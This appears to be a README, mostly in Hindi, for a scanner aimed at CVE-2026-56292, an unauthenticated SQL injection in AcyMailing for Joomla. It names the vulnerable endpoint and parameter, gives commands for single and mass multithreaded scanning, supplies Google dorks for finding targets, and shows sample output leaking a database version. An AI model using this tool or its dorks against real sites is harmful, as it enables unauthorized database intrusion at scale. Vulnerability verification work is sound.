
CVE-2026-56292 - AcyMailing for Joomla अनधिकृत SQL इंजेक्शन स्कैनर
लेखक: nullwhisper
केवल अधिकृत सुरक्षा अनुसंधान / भेद्यता सत्यापन के लिए।
AcyMailing for Joomla public front-end task frontentityselect::loadEntityFront को उजागर करता है। पुराने संस्करणों में columns पैरामीटर बिना sanitization के सीधे SQL क्वेरी में डाल दिया जाता है। पैच किए गए संस्करण acym_secureDBColumn() का उपयोग करते हैं और ... not secured जैसी त्रुटि लौटाते हैं।
index.php?option=com_acym&ctrl=frontentityselect&task=loadEntityFrontcolumns.
├── cve_2026_56292_acymailing_sqli.py # single + mass scanner
├── dorks.txt # google dorks
├── TECHNICAL.md # technical write-up
├── requirements.txt
├── LICENSE
└── README.md
pip3 install -r requirements.txt
एकल लक्ष्य:
python3 cve_2026_56292_acymailing_sqli.py -u http://target/
सामूहिक स्कैन:
python3 cve_2026_56292_acymailing_sqli.py -l targets.txt -v -T 30 -o vuln.txt
विकल्प:
-u URL single target
-l LIST target list file
-t TIMEOUT request timeout (default 30)
-T THREADS concurrent threads (default 10)
-o OUTPUT output file for vulnerable targets
-v verbose
--proxy PROXY http/https proxy
--patched-output FILE
--error-output FILE
AcyMailing v11.0.3 इंस्टॉल के विरुद्ध स्थानीय Joomla 5 लैब (vulnerable simulation mode) में परीक्षण किया गया।
[*] Loaded 1 unique target(s)
[1/1] [+] VULNERABLE: http://127.0.0.1:8080/ -> version=10.11.18-MariaDB-ubu2204
[*] Done. Vulnerable: 1 | Patched: 0 | Error/Other: 0 | Total: 1
dorks.txt देखें। प्राथमिक dork:
inurl:"index.php?option=com_acym"
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान के लिए है। इसका उपयोग उन प्रणालियों के विरुद्ध न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति आपके पास नहीं है। लेखक (nullwhisper) इस कोड के दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
MIT — LICENSE देखें।